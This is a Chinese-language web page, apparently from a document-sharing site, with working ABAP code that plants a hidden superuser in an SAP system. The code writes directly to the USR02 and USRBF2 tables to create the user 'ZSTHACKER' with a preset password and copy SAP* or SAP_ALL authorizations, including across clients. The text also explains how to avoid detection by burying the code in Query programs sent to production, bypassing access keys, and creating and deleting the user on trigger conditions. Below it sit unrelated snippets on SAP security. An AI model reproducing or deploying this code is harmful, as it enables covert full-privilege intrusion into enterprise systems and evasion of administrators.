下面是建立用户ZSTHACKER(初始密码123qaz)并赋予SAP*用户的所有权限.
Program ZCRTUSER.
Data ZUSR02 like USR02 .
***1Create User ZSTHACKER according to DDIC
select single * into ZUSR02 from USR02
where BNAME = 'DDIC'.
ZUSR02-BNAME = 'ZSTHACKER'.
ZUSR02-Bcode = 'E3B796BB09F7901B' .
insert USR02 from ZUSR02 .
***2Copy Auth. Obj from SAP*(or other)
data ZUSRBF2 like USRBF2 occurs 0 with header line.
select * from USRBF2 into table ZUSRBF2
where BNAME = 'SAP*' .
Loop at ZUSRBF2.
ZUSRBF2-BNAME =
'ZSTHACKER' .
Modify ZUSRBF2 INDEX
sy-tabix TRANSPORTING BNAME.
endloop.
INSERT USRBF2 FROM TABLE ZUSRBF2 ACCEPTING DUPLICATE KEYS.
如果SAP*被修改,直接从Tobj将所有的授权对象赋给ZSTHACKER就可.
Data Ztobj like tobj occurs 0 with header line .
data zusrbf2 like usrbf2.
select * into table ztobj from tobj .
loop at ztobj.
zusrbf2-mandt =
sy-mandt.
zusrbf2-bname =
'ZSTHACKER'.
zusrbf2-objct =
ztobj-objct.
zusrbf2-auth ='&_SAP_ALL'.
modify USRBF2 FROM zusrbf2 .
endloop .
现在还有一点就是basis能检测到多出的神秘ZSTHACKER用户,有一种方法就是basis极难发现这个秘密.读者可自行完成程序逻辑.思路如下:
[1]完善程序有建立和删除用户两功能,并将程序插入将要传送到PRD的实用Query(或report painter)等自动产生的程序(需要绕过Access Key).
[2]写个简单的逻辑如果query的某个条件满足建立用户赋予权限(象上面一样插入数据到USR02和USRBF2中),如果另一条件满足删除相关数据(从usr02和usrbf2中将数据删除)这样basis就难于发现.
***注意千万不要用此临时用户做一些不合理的动作.
[3]能不能垮client端建立用户和授权呢?
回答是肯定的,很简单,只要在插入数据时指定client就可.假设在client
100有个用户ZSTHACKER没有任何授权,当前client是300,下面的例子将300中SAP*的所有授权对象赋予给client 100的用户ZSTHACKER.(同理使用client
specified可跨client 建立用户).
Data zusrbf2 like usrbf2.
Select * into zusrbf2 from usrbf2 where bname = 'SAP*' .
Zusrbf2-bname = 'ZSTHACKER' .
Zusrbf2-mandt
= '100'.
Insert into usrbf2 client specified values zusrbf2.
Endselect .
|
相关推荐
### SAP权限自定义程序检查控制 #### 创建新的权限对象并在程序中使用 在SAP系统中,为了确保数据的安全性和访问的合规性,通常需要创建自定义的权限对象来实现更精细的权限管理。创建一个新的权限对象并将其应用...
你整一个Allocation structure, SAPhelp. Create Allocation Structure 551 5工单 552 Material Ledger 物料分类账详解 552 一.ML功能简介 552 二.标准价Pk加权平均价 559 三.差异来源和差异处理 564 四.SAP差异科目...
请注意,这些步骤展示了如何在SAP环境中更改权限控制,但这是一种非常不推荐的行为,因为它可能导致系统安全漏洞。在生产环境中,未经授权的权限修改可能会违反合规性规定,导致数据泄露或破坏。正确的做法是遵循SAP...
3. **强化的身份验证和访问控制**:可能存在的身份验证绕过漏洞被修复,增强了用户登录和权限管理的安全性,防止非法用户访问系统资源。 4. **防止恶意软件入侵**:补丁可能包含了对特定恶意软件或病毒的防御机制,...
- **安全考虑**:使用SAPNCO时,应确保遵循最佳安全实践,如使用加密的网络连接,限制访问权限,以及定期更新SAPNCO到最新版本以修复可能的安全漏洞。 - **多平台支持**:由于SAPNCO 4.0支持X64和X80架构,这意味着...
SAP GUI for Windows 7.30引入了安全模块,该模块旨在增强应用程序的安全性,并为用户提供更全面的安全控制。此模块允许管理员定义一系列规则来限制或允许特定操作。 ##### SAP GUI Security Settings 在设置SAP ...
对于这样的问题,SAP通常会发布补丁来修复已知的系统漏洞或提高程序的稳定性。"SAPSLTESP00_0-70001053.EXE"很可能是这样一个补丁文件,它可能包含了修复"CSapEditorCtrl::GetObject"错误的更新。在安装这个补丁前,...
在SAP系统中,授权是控制用户访问权限的核心机制。以下是授权管理的一个示例: 1. **用户主记录**:每个用户都需要有一个主记录,例如用户Frank W. Lyons。 - **配置文件**:用户被分配一个或多个配置文件来定义其...
在SAP环境中,事务代码是用户执行特定任务或功能的入口点,RZ11主要用于设置和控制与SAP GUI Scripting相关的安全参数。 在SAP GUI Scripting的上下文中,RZ11的重要性体现在它能够保护关键的SAP系统免受未经授权的...
使用RFC进行通信时,应考虑安全性,例如使用SSL/TLS加密连接,限制RFC功能的访问权限,以及定期更新连接库以防止潜在的安全漏洞。 总结,"64位 sap连接2.1.10 dll"涉及到的是SAP系统与64位应用程序之间的集成,...
2. **CMS服务器**:作为核心组件,CMS负责管理所有对象、用户权限、版本控制以及系统配置。它存储了元数据,是整个BOE环境的心脏。 3. **Repository**:这是一个数据库,存储着所有的报表、数据源、用户信息和其他...
sa用户拥有对数据库系统的几乎无限访问权限,这包括所有数据库。如果sa账户没有密码保护,任何Windows NT用户都可以登录数据库成为超级用户,这将导致严重的安全漏洞。 5. 密码设置步骤 为了解决这个问题,文档详细...
17. 评价SAP整体安全架构:包括用户权限、访问控制、加密机制等,以确保数据的机密性和完整性。 18. 确定运行的操作系统和数据库管理系统:这直接影响系统的性能和安全性。 19-28. 获取各种关键业务对象的列表:如...
- 使用具有足够权限的系统级用户(如DDIC或SAP*)登录Client 000。 - 打开事务代码SPAM,选择从应用服务器装载补丁文件(`From Application Server`)。 5. **定义和支持包队列**: - 选择需要安装补丁的应用...
- 安全审计:利用PowerShell,可以检查SAP系统的用户权限、角色分配和访问控制设置,以确保符合企业安全政策。 - 配置审查:自动化脚本可以检查SAP系统配置,对比最佳实践,发现可能影响系统运行的不合规项。 - 报告...
**PFCG**是SAP系统中用于管理用户角色和权限的核心工具。正确配置PFCG不仅能够提高安全性,还能提升工作效率。 1. **创建新角色**: - 进入PFCG事务代码。 - 选择“创建”选项。 - 定义角色名称和描述。 - 通过...
- **用户管理工具**:如ABAP应用服务器的用户管理(事务代码:SU01)、SAP NetWeaver身份管理等,用于高效管理用户及其权限。 **2. 网络通信安全** - 保护在网络上传输的数据,特别是当数据通过互联网发送时,应...
9. **安全考虑**:在使用JCo时,应遵循最佳安全实践,如使用SSL加密连接,定期更新JCo库以修复潜在的安全漏洞,以及限制对SAP系统的访问权限。 10. **社区支持**:SAP提供了详细的JCo开发文档,包括API参考、用户...